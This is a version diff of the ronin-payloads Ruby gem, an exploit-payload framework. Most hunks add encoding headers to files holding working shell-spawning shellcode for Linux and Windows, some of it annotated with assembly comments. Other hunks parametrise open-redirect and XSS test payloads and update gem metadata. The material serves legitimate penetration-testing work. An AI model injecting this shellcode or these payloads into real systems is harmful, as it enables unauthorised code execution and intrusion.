"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" \
|
60
61
|
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" \
|
61
|
-
"\x5f\x6a\x3b\x58\x0f\x05"
|
62
|
+
"\x5f\x6a\x3b\x58\x0f\x05"
|
62
63
|
end
|
63
64
|
|
64
65
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -55,7 +56,7 @@ module Ronin
|
|
55
56
|
@payload = "\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01" \
|
56
57
|
"\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6" \
|
57
58
|
"\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69" \
|
58
|
-
"\x6e\x2f\x2f\x73\x68"
|
59
|
+
"\x6e\x2f\x2f\x73\x68"
|
59
60
|
end
|
60
61
|
|
61
62
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -60,7 +61,7 @@ module Ronin
|
|
60
61
|
"\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83" \
|
61
62
|
"\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48" \
|
62
63
|
"\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed" \
|
63
|
-
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
|
64
|
+
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
|
64
65
|
end
|
65
66
|
|
66
67
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -74,7 +75,7 @@ module Ronin
|
|
74
75
|
"\x01\x01\x01\x01" \
|
75
76
|
"\x02\x02\x02\x02" \
|
76
77
|
"\x03\x03\x03\x03" \
|
77
|
-
"\x9a\x04\x04\x04\x04\x07\x04"
|
78
|
+
"\x9a\x04\x04\x04\x04\x07\x04"
|
78
79
|
end
|
79
80
|
|
80
81
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -60,7 +61,7 @@ module Ronin
|
|
60
61
|
"\xef\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d" \
|
61
62
|
"\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51" \
|
62
63
|
"\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f" \
|
63
|
-
"\x73\x68\x41\x90"
|
64
|
+
"\x73\x68\x41\x90"
|
64
65
|
end
|
65
66
|
|
66
67
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -52,18 +53,18 @@ module Ronin
|
|
52
53
|
# Builds the shellcode.
|
53
54
|
#
|
54
55
|
def build
|
55
|
-
@payload = "\x99"
|
56
|
-
"\x52"
|
57
|
-
"\x68\x6e\x2f\x73\x68"
|
58
|
-
"\x68\x2f\x2f\x62\x69"
|
59
|
-
"\x89\xe3"
|
60
|
-
"\x52"
|
61
|
-
"\x54"
|
62
|
-
"\x53"
|
63
|
-
"\x53"
|
64
|
-
"\x6a\x3b"
|
65
|
-
"\x58"
|
66
|
-
"\xcd\x80"
|
56
|
+
@payload = "\x99" + # cltd
|
57
|
+
"\x52" + # push %edx
|
58
|
+
"\x68\x6e\x2f\x73\x68" + # push $0x68732f6e
|
59
|
+
"\x68\x2f\x2f\x62\x69" + # push $0x69622f2f
|
60
|
+
"\x89\xe3" + # mov %esp,%ebx
|
61
|
+
"\x52" + # push %edx
|
62
|
+
"\x54" + # push %esp
|
63
|
+
"\x53" + # push %ebx
|
64
|
+
"\x53" + # push %ebx
|
65
|
+
"\x6a\x3b" + # push $0x3b
|
66
|
+
"\x58" + # pop %eax
|
67
|
+
"\xcd\x80" # int $0x80
|
67
68
|
end
|
68
69
|
|
69
70
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -52,26 +53,26 @@ module Ronin
|
|
52
53
|
# Builds the shellcode.
|
53
54
|
#
|
54
55
|
def build
|
55
|
-
@payload = "\x31\xC9"
|
56
|
-
"\x64\x8B\x71\x30"
|
57
|
-
"\x8B\x76\x0C"
|
58
|
-
"\x8B\x76\x1C"
|
59
|
-
"\x8B\x36"
|
60
|
-
"\x8B\x06"
|
61
|
-
"\x8B\x68\x08"
|
62
|
-
"\xEB\x20"
|
63
|
-
"\x5B"
|
64
|
-
"\x53"
|
65
|
-
"\x55"
|
66
|
-
"\x5B"
|
67
|
-
"\x81\xEB\x11\x11\x11\x11"
|
68
|
-
"\x81\xC3\xDA\x3F\x1A\x11"
|
69
|
-
"\xFF\xD3"
|
70
|
-
"\x81\xC3\x11\x11\x11\x11"
|
71
|
-
"\x81\xEB\x8C\xCC\x18\x11"
|
72
|
-
"\xFF\xD3"
|
73
|
-
"\xE8\xDB\xFF\xFF\xFF"
|
74
|
-
"\x63\x6d\x64"
|
56
|
+
@payload = "\x31\xC9" + # xor ecx,ecx
|
57
|
+
"\x64\x8B\x71\x30" + # mov esi,[fs:ecx+0x30]
|
58
|
+
"\x8B\x76\x0C" + # mov esi,[esi+0xc]
|
59
|
+
"\x8B\x76\x1C" + # mov esi,[esi+0x1c]
|
60
|
+
"\x8B\x36" + # mov esi,[esi]
|
61
|
+
"\x8B\x06" + # mov eax,[esi]
|
62
|
+
"\x8B\x68\x08" + # mov ebp,[eax+0x8]
|
63
|
+
"\xEB\x20" + # jmp short 0x35
|
64
|
+
"\x5B" + # pop ebx
|
65
|
+
"\x53" + # push ebx
|
66
|
+
"\x55" + # push ebp
|
67
|
+
"\x5B" + # pop ebx
|
68
|
+
"\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
|
69
|
+
"\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
|
70
|
+
"\xFF\xD3" + # call ebx
|
71
|
+
"\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
|
72
|
+
"\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
|
73
|
+
"\xFF\xD3" + # call ebx
|
74
|
+
"\xE8\xDB\xFF\xFF\xFF" + # call dword 0x15
|
75
|
+
"\x63\x6d\x64" # db "cmd"
|
75
76
|
end
|
76
77
|
|
77
78
|
end
|
@@ -37,11 +37,14 @@ module Ronin
|
|
37
37
|
Simply redirects to https://google.com/.
|
38
38
|
DESC
|
39
39
|
|
40
|
+
param :url, default: 'https://google.com/',
|
41
|
+
desc: 'The open redirect URL'
|
42
|
+
|
40
43
|
#
|
41
44
|
# Builds the Open Redirect test payload.
|
42
45
|
#
|
43
46
|
def build
|
44
|
-
@payload =
|
47
|
+
@payload = params[:url]
|
45
48
|
end
|
46
49
|
|
47
50
|
end
|
@@ -37,11 +37,14 @@ module Ronin
|
|
37
37
|
Simply calls `alert(1)`.
|
38
38
|
DESC
|
39
39
|
|
40
|
+
param :javascript, default: 'alert(1)',
|
41
|
+
desc: 'The JavaScript to inject'
|
42
|
+
|
40
43
|
#
|
41
44
|
# Builds the XSS test payload.
|
42
45
|
#
|
43
46
|
def build
|
44
|
-
@payload =
|
47
|
+
@payload = params[:javascript]
|
45
48
|
end
|
46
49
|
|
47
50
|
end
|
data/lib/ronin/payloads/cli.rb
CHANGED
@@ -20,6 +20,7 @@
|
|
20
20
|
#
|
21
21
|
|
22
22
|
require 'ronin/payloads/version'
|
23
|
+
require 'ronin/core/cli/help/banner'
|
23
24
|
|
24
25
|
require 'command_kit/commands'
|
25
26
|
require 'command_kit/commands/auto_load'
|
@@ -40,6 +41,7 @@ module Ronin
|
|
40
41
|
namespace: "#{self}::Commands"
|
41
42
|
)
|
42
43
|
include CommandKit::Options::Version
|
44
|
+
include Core::CLI::Help::Banner
|
43
45
|
|
44
46
|
command_name 'ronin-payloads'
|
45
47
|
version Ronin::Payloads::VERSION
|
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: ronin-payloads
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.2.0
|
4
|
+
version: 0.2.0
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Postmodern
|
8
8
|
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2024-
|
11
|
+
date: 2024-07-22 00:00:00.000000000 Z
|
12
12
|
dependencies:
|
13
13
|
- !ruby/object:Gem::Dependency
|
14
14
|
name: ronin-support
|
@@ -58,14 +58,14 @@ dependencies:
|
|
58
58
|
requirements:
|
59
59
|
- - "~>"
|
60
60
|
- !ruby/object:Gem::Version
|
61
|
-
version: 0.2
|
61
|
+
version: '0.2'
|
62
62
|
type: :runtime
|
63
63
|
prerelease: false
|
64
64
|
version_requirements: !ruby/object:Gem::Requirement
|
65
65
|
requirements:
|
66
66
|
- - "~>"
|
67
67
|
- !ruby/object:Gem::Version
|
68
|
-
version: 0.2
|
68
|
+
version: '0.2'
|
69
69
|
- !ruby/object:Gem::Dependency
|
70
70
|
name: ronin-repos
|
71
71
|
requirement: !ruby/object:Gem::Requirement
|
@@ -309,7 +309,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
309
309
|
- !ruby/object:Gem::Version
|
310
310
|
version: '0'
|
311
311
|
requirements: []
|
312
|
-
rubygems_version: 3.
|
312
|
+
rubygems_version: 3.5.11
|
313
313
|
signing_key:
|
314
314
|
specification_version: 4
|
315
315
|
summary: A Ruby micro-framework for writing and running exploit payloads
|